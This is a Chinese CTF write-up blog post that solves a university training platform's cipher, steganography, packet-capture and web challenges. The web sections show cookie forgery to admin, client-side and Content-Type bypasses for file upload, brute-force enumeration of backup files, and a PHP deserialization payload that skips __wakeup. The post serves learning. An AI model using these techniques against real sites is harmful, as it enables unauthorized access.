<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="天朝挖煤CTF"/>




  <meta name="keywords" content="ctf, writeup, 密码, 隐写, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2017/03/02/天朝挖煤ctf/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  
  <script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?9a885cc9fb6cd7bcef579deb8efe8a70";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>



  <script id="google_analytics">
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

        ga('create', 'UA-102975942-1', 'auto');
        ga('send', 'pageview');
  </script>










    <title> 天朝挖煤CTF - 八一 </title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">八一</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    
      <a href="/archives">
        <li class="mobile-menu-item">
          
          
            文章
          
        </li>
      </a>
    
      <a href="/tags">
        <li class="mobile-menu-item">
          
          
            标签
          
        </li>
      </a>
    
      <a href="/about">
        <li class="mobile-menu-item">
          
          
            关于/友链
          
        </li>
      </a>
    
      <a href="/search">
        <li class="mobile-menu-item">
          
          
            站内搜索
          
        </li>
      </a>
    
  </ul>
</nav>

    <div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">八一</a>
</div>

<nav class="site-navbar">
  
    <ul id="menu" class="menu">
      
        <li class="menu-item">
          <a class="menu-item-link" href="/archives">
            
            
              文章
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/tags">
            
            
              标签
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/about">
            
            
              关于/友链
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/search">
            
            
              站内搜索
            
          </a>
        </li>
      
    </ul>
  
</nav>

      </header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          天朝挖煤CTF
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-03-02
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#你的石锅拌饭"><span class="toc-text">你的石锅拌饭</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#魂斗罗"><span class="toc-text">魂斗罗</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#cookies"><span class="toc-text">cookies?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#我就想试试这个名字到底能够起多长"><span class="toc-text">我就想试试这个名字到底能够起多长</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#上传一"><span class="toc-text">上传一</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#备份"><span class="toc-text">备份</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#colorSnake"><span class="toc-text">colorSnake</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#自动获取flag程序"><span class="toc-text">自动获取flag程序</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#萌萌哒"><span class="toc-text">萌萌哒</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#听说你会面向对象"><span class="toc-text">听说你会面向对象</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#上传二"><span class="toc-text">上传二</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#听说这是一道签到题目"><span class="toc-text">听说这是一道签到题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#学姐真美"><span class="toc-text">学姐真美</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#白驹过隙"><span class="toc-text">白驹过隙</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#logic"><span class="toc-text">logic</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#上传三"><span class="toc-text">上传三</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#phpmywind"><span class="toc-text">phpmywind</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#获取基本信息"><span class="toc-text">获取基本信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#也可以这样一个个爆库"><span class="toc-text">也可以这样一个个爆库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#爆表"><span class="toc-text">爆表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#爆字段"><span class="toc-text">爆字段</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#显示flag"><span class="toc-text">显示flag</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#md5"><span class="toc-text">md5</span></a></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>中国矿业大学网络安全实训平台 <a id="more"></a></p>
<h2 id="你的石锅拌饭"><a href="#你的石锅拌饭" class="headerlink" title="你的石锅拌饭"></a>你的石锅拌饭</h2><p><img src="https://s1.ax1x.com/2018/01/01/pSfFWF.png" alt="SGBF.png"></p>
<blockquote>
<p>打开<a href="http://219.219.61.234/challenges.php##你的石锅拌饭。" target="_blank" rel="noopener">链接</a>还是原来的页面,仔细读那几句话，发现培根，而且这段话字体不同，<br>想到培根密码。百度查表可知flag。此题源于学校三食堂有名的石锅拌饭。。。。。</p>
</blockquote>
<h2 id="魂斗罗"><a href="#魂斗罗" class="headerlink" title="魂斗罗"></a>魂斗罗</h2><blockquote>
<p>打开<a href="http://219.219.61.234/challenges.php##魂斗罗" target="_blank" rel="noopener">链接</a>是一个文件，分析可知是个游戏，用模拟器打开就是经典的魂斗罗，<br>提示是：上上下下左右左右，百度可知作弊代码就是这段话，下载金手指，选关即可通过。<br>PS：注意flag的形式，仔细看清楚再提交哦</p>
</blockquote>
<h2 id="cookies"><a href="#cookies" class="headerlink" title="cookies?"></a>cookies?</h2><blockquote>
<p>打开<a href="http://219.219.61.234/challenge/web/cookiiii/" target="_blank" rel="noopener">链接</a>，显示让以管理员身份登录，在谷歌或者火狐浏览器中<br>F12，重新编辑消息头，修改user=admin<br>提交，响应为<br><img src="https://s1.ax1x.com/2018/01/01/pSREhF.png" alt="cookies.png"><br>在网址后添加k.jpg,得到一张大佬的图片<br><img src="https://s1.ax1x.com/2018/01/01/pSRAtU.png" alt="cookies1.png"><br>丢进百度识图，可知维基利亚密码，对照表，有提示key:e，我就移动四位，得<strong>bpqaqaivwtlmvkzgxb</strong><br>自信的去提交flag…..显示错误。顿时崩溃，，，看来手动解是解不出来了。<br>丢进凯撒密码，列出所有可能，flag一般是一句话，找出就得flag<br><img src="https://s1.ax1x.com/2018/01/01/pSRZp4.png" alt="cookies2.png"><br>PS:凯撒密码是维基利亚密码的升级版（自我感觉）</p>
</blockquote>
<h2 id="我就想试试这个名字到底能够起多长"><a href="#我就想试试这个名字到底能够起多长" class="headerlink" title="我就想试试这个名字到底能够起多长"></a>我就想试试这个名字到底能够起多长</h2><blockquote>
<p>打开<a href="http://219.219.61.234/challenge/misc/flag.png" target="_blank" rel="noopener">链接</a>是一张图片</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pS2b0P.png" alt="yinxie1.png"></p>
<blockquote>
<p>提示有说是常规隐写，所以直接丢进Stegsolve<br>点击左右键，发现Red plane 2,Red plane 1,Red plane 0三处变化较大，点击右上角进行数据分析<br>发现0处数据为PK开头，百度文件类型，可知为压缩包，改后缀.zip，解压得到一个文件，丢尽Winhex</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pS25SH.png" alt="yinxie1-0.png"></p>
<blockquote>
<p>搜索ctf得到flag</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pS2Ild.png" alt="yinxie1-1.png"></p>
<h2 id="上传一"><a href="#上传一" class="headerlink" title="上传一"></a>上传一</h2><blockquote>
<p>打开<a href="http://219.219.61.234/challenge/web/uploadfile/" target="_blank" rel="noopener">链接</a>,是一个上传文件的页面，我就开始各种百度<br>有种方法说可以修改后缀，我就一直尝试各种加;jpg,.rar。最后才知道那是解析漏洞，需要针对特殊的事件<br>然后我就开始了一件很智障的事情，在F12中修改js源码，。。。。然而没什么卵用。<br><img src="https://s1.ax1x.com/2018/01/01/pSfkz4.png" alt="shangchuan1.png"><br>当然没什么用，有没有修改服务器里的源码，也没有任何的响应。只能欺骗自己<br>最后询问后端组长之后，分析了js代码，知道check函数是全局变量，可以在控制台修改<br>操作成功，抱着组长大腿痛哭流涕，完全不懂前端，然后就可以上传可执行文件了。<br><img src="https://s1.ax1x.com/2018/01/01/pSfEQJ.png" alt="shangchuan1-1.png"></p>
</blockquote>
<p><em>PS</em>:JS定义全局变量有三种方式<br><strong>直接定义全局变量</strong></p>
<figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> check=<span class="number">1</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span><span class="params">()</span></span>&#123;</span><br><span class="line">.....</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>不用var，直接隐式定义</strong></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">check=<span class="number">1</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>在控制台中直接输入window定义</strong></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">window</span>.check </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">....</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<hr>
<div align="center">我是分割线-补充于2017-03-13 23:30:17</div>

<p>太菜了，也只能继续更新我天朝挖煤大学的题目了。。。。。<br>以下三道是组长帮助，所以就单独列出来了</p>
<h2 id="备份"><a href="#备份" class="headerlink" title="备份"></a>备份</h2><blockquote>
<p>打开<a href="http://219.219.61.234/challenge/web/code/" target="_blank" rel="noopener">链接</a>,显示1.bak,2.bak<br>我又试了试3.bak,5.bak都有内容显示，所以可以想到flag就在某个*.bak<br>一开始我并不会写python,之后学了点，在组长的指导下，自己写出来了这段代码</p>
</blockquote>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">3</span>,<span class="number">1000</span>):</span><br><span class="line">   t = requests.get(<span class="string">'http://219.219.61.234/challenge/web/code/'</span>+str(i)+<span class="string">'.bak'</span>)</span><br><span class="line">   <span class="keyword">print</span> (i)</span><br><span class="line">   <span class="keyword">if</span> <span class="string">'flag'</span> <span class="keyword">in</span> t.text:</span><br><span class="line">       print(t.text)</span><br><span class="line">   <span class="keyword">else</span> :</span><br><span class="line">       <span class="keyword">continue</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>怎么说呢，这道题会写代码了，就很简单了。<br>直接贴代码，让它运行就好了。。。。。。吗？？？??<br>很不幸的是抛出了一大堆异常，连接服务器总是中断，那么问题来了：如何解决python的异常？<br>就是try…except…</p>
</blockquote>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span>:</span><br><span class="line">	<span class="comment">##你要执行的但是可能出现异常的代码</span></span><br><span class="line"><span class="keyword">except</span> (NameError,....):<span class="comment">##错误类型</span></span><br><span class="line">	<span class="comment">##出现了错误要做什么</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	<span class="comment">##没错误要做什么</span></span><br><span class="line"><span class="keyword">finally</span>:</span><br><span class="line">	<span class="comment">##无论上方是否抛出异常，都会执行这句话</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>大概就是这三种<br>最后的代码是这样的，竟然flag是900多。。。。。</p>
</blockquote>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">traverse</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">1000</span>):</span><br><span class="line">		t = requests.get(<span class="string">'http://219.219.61.234/challenge/web/code/'</span>+str(i)+<span class="string">'.bak'</span>)</span><br><span class="line">		<span class="keyword">if</span> i%<span class="number">50</span> == <span class="number">0</span>:</span><br><span class="line">			<span class="keyword">print</span> (i)</span><br><span class="line">		<span class="keyword">if</span> <span class="string">'flag'</span> <span class="keyword">in</span> t.text:</span><br><span class="line">			print(t.text)</span><br><span class="line">		<span class="keyword">else</span> :</span><br><span class="line">			<span class="keyword">continue</span></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">	traverse()</span><br><span class="line"><span class="keyword">finally</span>:</span><br><span class="line">	traverse()</span><br></pre></td></tr></table></figure>
<h2 id="colorSnake"><a href="#colorSnake" class="headerlink" title="colorSnake"></a>colorSnake</h2><blockquote>
<p>打开<a href="http://202.119.201.199/challenge/web/colorSnake/" target="_blank" rel="noopener">链接</a>,真的是一个贪吃蛇游戏，还是炫彩的。。orz<br>看到这道题第一次还是忍不住玩了一下，但是真的好难。。。。233333<br>随后先F12查看源码，一直没有头绪，最后也是在组长的和组内大佬讨论下，尝试了改分数，改food出现位置，，，，然而都没有用<br>最后，找到这段getScore代码，在控制台提交，分数变了。所以接下来直接调用JS计时器</p>
</blockquote>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">setInterval(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;xhr(<span class="string">'./getScore.php'</span>,<span class="function"><span class="keyword">function</span>(<span class="params">e</span>)</span>&#123;</span><br><span class="line">               <span class="keyword">var</span> r = <span class="built_in">JSON</span>.parse(e);</span><br><span class="line">               <span class="keyword">if</span>(r.state == <span class="number">200</span>)</span><br><span class="line">                   game.addScore(r.score);</span><br><span class="line">               <span class="keyword">else</span>&#123;</span><br><span class="line">                   alert(r.msg);</span><br><span class="line">                   game.start()</span><br><span class="line">               &#125;</span><br><span class="line">           &#125;)&#125;,<span class="number">1000</span>)</span><br></pre></td></tr></table></figure>
<p>PS:<strong>JS计时器setInterval</strong></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">setInterval(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;alert(<span class="string">"Hello"</span>)&#125;,<span class="number">1000</span>);</span><br></pre></td></tr></table></figure>
<blockquote>
<p>这里记录一下，对于这个计时器我也是鼓捣好久，已经让我怀疑不适合学计算机。。。。<br>setInterval(function(){这里面填写要执行的代码}),一开始我老是纠结第一个参数明明是函数代码，为什么<br>不能直接贴上函数代码，非要加个function,说实话，现在也是似懂非懂，可能还是没学过JS吧。。。<br>这里的参数function是一个函数名或者一个对匿名函数的引用</p>
</blockquote>
<blockquote>
<p>简单的示例，可以自行百度</p>
</blockquote>
<h2 id="自动获取flag程序"><a href="#自动获取flag程序" class="headerlink" title="自动获取flag程序"></a>自动获取flag程序</h2><blockquote>
<p>打开<a href="http://202.119.201.199/challenge/web/ctf0001/" target="_blank" rel="noopener">链接</a>，是一个未完整的程序<br>那就很自然的F12查看源码，提示已经说了是要修改代码,下面是它给的源码</p>
</blockquote>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 请求参数一</span></span><br><span class="line">$(<span class="string">"##a"</span>).click(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">	$.ajax(&#123;</span><br><span class="line">		url:<span class="string">'param1.php'</span>,</span><br><span class="line">		method:<span class="string">'get'</span>,</span><br><span class="line">		dataType:<span class="string">'json'</span>,</span><br><span class="line">		success:calParam2</span><br><span class="line">	&#125;)</span><br><span class="line">&#125;);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">calParam2</span>(<span class="params">d</span>)</span>&#123; <span class="comment">// 获取参数d</span></span><br><span class="line">	<span class="keyword">var</span> data=<span class="built_in">JSON</span>.parse((d.param));</span><br><span class="line">	<span class="keyword">var</span> length=data.length;</span><br><span class="line">	<span class="keyword">var</span> second=<span class="keyword">new</span> <span class="built_in">Date</span>().getSeconds();</span><br><span class="line">	<span class="keyword">var</span> sum=<span class="number">0</span>;</span><br><span class="line">	<span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">1</span>; i &lt; length; i++) &#123;</span><br><span class="line">		<span class="keyword">for</span> (<span class="keyword">var</span> j = <span class="number">0</span>; j &lt; length/<span class="number">2</span>; j++) &#123;</span><br><span class="line">			sum+=<span class="built_in">parseInt</span>(data[i])*second + data[j];</span><br><span class="line">		&#125; <span class="comment">// 应该是用for循环求出参数各个数值和</span></span><br><span class="line">	&#125;</span><br><span class="line"><span class="comment">// 请求flag</span></span><br><span class="line">$.ajax(&#123;</span><br><span class="line">	url:<span class="string">'http://new.pmcaff.com/aram2.php?param='</span>+sum, <span class="comment">// 这里url对着上面的url明显是错误的</span></span><br><span class="line">	method:<span class="string">'get'</span>,</span><br><span class="line">	dataType:<span class="string">'json'</span>,</span><br><span class="line">	success:<span class="function"><span class="keyword">function</span>(<span class="params">s</span>)</span>&#123;</span><br><span class="line">		alert(s.f);</span><br><span class="line">	&#125;,</span><br><span class="line">	error:<span class="function"><span class="keyword">function</span>(<span class="params">s</span>)</span>&#123;</span><br><span class="line">		alert(<span class="string">'错了'</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>打开./param1.php,得到的是一堆url</p>
</blockquote>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="string">"param"</span>:</span><br><span class="line">	<span class="string">"%5B%221%22%2C%226%22%2C%222%22%2C%228%22%2C%224%22%2C%222%22%2C</span></span><br><span class="line"><span class="string">	%228%22%2C%224%22%2C%229%22%2C%221%22%2C%2210%22%5D"</span>&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>解码得到一个数组，那就对了,可以求和(JSON.parse的作用就是处理数据让他可以加和)<br>然后第二个url对照第一个改为：’param2.php?param=’+sum,但是程序中直接得到的参数是编码的<br>所以在程序中加上解码语句<strong>d.param=unescape(d.param)</strong></p>
</blockquote>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">	function calParam2(d)&#123;</span><br><span class="line">	d.param=unescape(d.param);</span><br><span class="line">	var data=JSON.parse((d.param));</span><br><span class="line">	var length=data.length;</span><br><span class="line">	var second=new Date().getSeconds();</span><br><span class="line">	var sum=<span class="number">0</span>;</span><br><span class="line">	<span class="keyword">for</span> (var i = <span class="number">1</span>; i &lt; length; i++) &#123;</span><br><span class="line">		<span class="keyword">for</span> (var j = <span class="number">0</span>; j &lt; length/<span class="number">2</span>; j++) &#123;</span><br><span class="line">			sum+=parseInt(data[i])*second + data[j];</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	// 请求flag</span><br><span class="line">	$.ajax(&#123;</span><br><span class="line">		url:<span class="string">'param2.php?param='</span>+sum,</span><br><span class="line">		method:<span class="string">'get'</span>,</span><br><span class="line">		dataType:<span class="string">'json'</span>,</span><br><span class="line">		success:function(s)&#123;</span><br><span class="line">			alert(s.f);</span><br><span class="line"></span><br><span class="line">		&#125;,</span><br><span class="line">		error:function(s)&#123;</span><br><span class="line">			alert(<span class="string">'错了'</span>);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>为什么要加上d.param而不是参数d呢？我没学过JS，但是看参数d的形式就是python字典，要解码的是字典里的后半部分<br>还有，就是我一开始在控制台输入之后，会一直弹出”呵呵呵呵”，根据组长的解释是传递参数错误才会这样，这一段<br>是和时间参数有关系的，所以。。。。。。。根据我的实践，就是多点几次，，，，可能就是成功了。这是我的理解。<br>真正的理解还望指教</p>
</blockquote>
<hr>
<div align="center">我是分割线-补充于2017-03-25 18:17:01</div>

<p>233333333333orz，扶我起来，我还能水</p>
<h2 id="萌萌哒"><a href="#萌萌哒" class="headerlink" title="萌萌哒"></a>萌萌哒</h2><blockquote>
<p>打开<a href="http://202.119.201.199/challenge/misc/fxxk/encodes.php" target="_blank" rel="noopener">链接</a>,和提示一样，显示的是一堆类似表情包<br>真的是萌萌哒啊。。。。。。<br>这一堆是什么东西。不知道 就百度 就谷歌呗，最后做出来才知道，是两种加密<br>第一种就是颜表情包解码<a href="https://cat-in-136.github.io/2010/12/aadecode-decode-encoded-as-aaencode.html" target="_blank" rel="noopener">点我进解码地址</a><br>解码得到下图结果</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSWUGF.png" alt="mengmengda"></p>
<blockquote>
<p>改地址进入，又是一堆只有八个操作符的东西，，，，，老方法，不知道，就百度呗<br>最后知道这是一种语言–&gt;<span style="color: red;">Brainfuck</span><br>又是百度，各种姿势搜索，找到了解码地址<a href="https://www.splitbrain.org/services/ook" target="_blank" rel="noopener">点我</a><br>丢进去，转码得flag！<br>自己不会写工具就只能这样了，搜搜搜。</p>
</blockquote>
<hr>
<div align="center">我是分割线-补充于2017-04-7</div>


<h2 id="听说你会面向对象"><a href="#听说你会面向对象" class="headerlink" title="听说你会面向对象"></a>听说你会面向对象</h2><blockquote>
<p>打开<a href="http://202.119.201.199/challenge/web/php_object_injection/" target="_blank" rel="noopener">链接</a>，看见链接我们就会知道是PHP反序列化漏洞<br>但是身为小白的我不会什么PHP啊，也不知道什么是反序列化，老办法-搜搜搜。。。。</p>
</blockquote>
<p><strong>什么是反序列化？</strong></p>
<blockquote>
<p>这问题就不赘述了，说了也是看的别人的，贴链接<br>这是介绍反序列化的<a href="http://www.2cto.com/article/201610/557427.html" target="_blank" rel="noopener">点我</a><br>所以我们直接构造<span style="color: red;">data=O:5:”Admin”:1:{s:4:”file”;s:8:”flag.php”;}</span>,但是。。。<br><img src="https://s1.ax1x.com/2018/01/01/pSRe1J.png" alt="ctf3-1.png"></p>
</blockquote>
<blockquote>
<p>很明显是<strong>wakeup()是它在搞事情，那么下面那我们要做的就是绕过它<br>经过搜搜搜搜，知道此函数的一个漏洞<br><span style="color: red;">PHP当序列化字符串中表示对象属性数的值大于真实的属性个数时会跳过</span></strong>wakeup()的执行<br><img src="https://s1.ax1x.com/2018/01/01/pSRM0x.png" alt="ctf3-2"></p>
</blockquote>
<p>总体来说这道题还是比较基础和简单的，只是我太菜了，。。做了好长时间，不过也长了不少知识</p>
<h2 id="上传二"><a href="#上传二" class="headerlink" title="上传二"></a>上传二</h2><p><strong>首先要说一下几种上传验证手段：</strong></p>
<p>&nbsp;A: 客户端js校验（一般只校验后缀名）<br>&nbsp;B: 服务端校验<br>&nbsp;&nbsp;&nbsp;1.文件头content-type字段校验（image/gif）<br>&nbsp;&nbsp;&nbsp;2.文件内容头校验（GIF89a）<br>&nbsp;&nbsp;&nbsp;3.后缀名黑名单校验<br>&nbsp;&nbsp;&nbsp;4.后缀名白名单校验<br>&nbsp;&nbsp;&nbsp;5.自定义正则校验<br>&nbsp;C: WAF设备校验（根据不同的WAF产品而定）</p>
<blockquote>
<p>打开<a href="http://202.119.201.199/challenge/web/uploadfile/" target="_blank" rel="noopener">链接</a>,和上传一地址一样<br>就是接着上传一开始做的，首先修改JS验证<br>然后用brup抓包，修改文件头content-type字段为：image/gif<br>重新发送即可</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pS2TOI.png" alt="上传二"></p>
<p>参考文章：<a href="https://xianzhi.aliyun.com/forum/read/458.html?fpage=2" target="_blank" rel="noopener">点我</a></p>
<hr>
<div align="center">我是分割线-补充于2017-04-15 21:27:00</div>

<p>最近平台多的一些学校入门赛的题目，就不写wp了，官方有了<a href="http://www.bxsteam.xyz/2017/04/12/cumtctf2017%E5%85%A5%E9%97%A8%E8%B5%9Bwriteup/" target="_blank" rel="noopener">点我</a></p>
<h2 id="听说这是一道签到题目"><a href="#听说这是一道签到题目" class="headerlink" title="听说这是一道签到题目"></a>听说这是一道签到题目</h2><blockquote>
<p>先贴一个链接，补充点姿势<a href="http://metasploit.lofter.com/post/d9d60_89a1f47" target="_blank" rel="noopener">数据包分析for CTF</a><br>打开<a href="http://202.119.201.199/challenges.php##据说是个签到题" target="_blank" rel="noopener">链接</a><br>很明显是一个抓取的数据包，用Wireshark打开，分析对话，在tcp流，发现异常对话</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfTX9.png" alt="Wireshak-1"></p>
<blockquote>
<p>跟踪tcp流，发现flag信息</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfHmR.png" alt="Wireshark-2"></p>
<blockquote>
<p>而且function.py 这里代码都给出来了</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfqTx.png" alt="Wireshark-3"></p>
<blockquote>
<p>直接解原字符串是不能解的，所以需要先base64<br>具体操作如下，用给出的代码直接解就行了</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfb01.png" alt="Wireshark-4"></p>
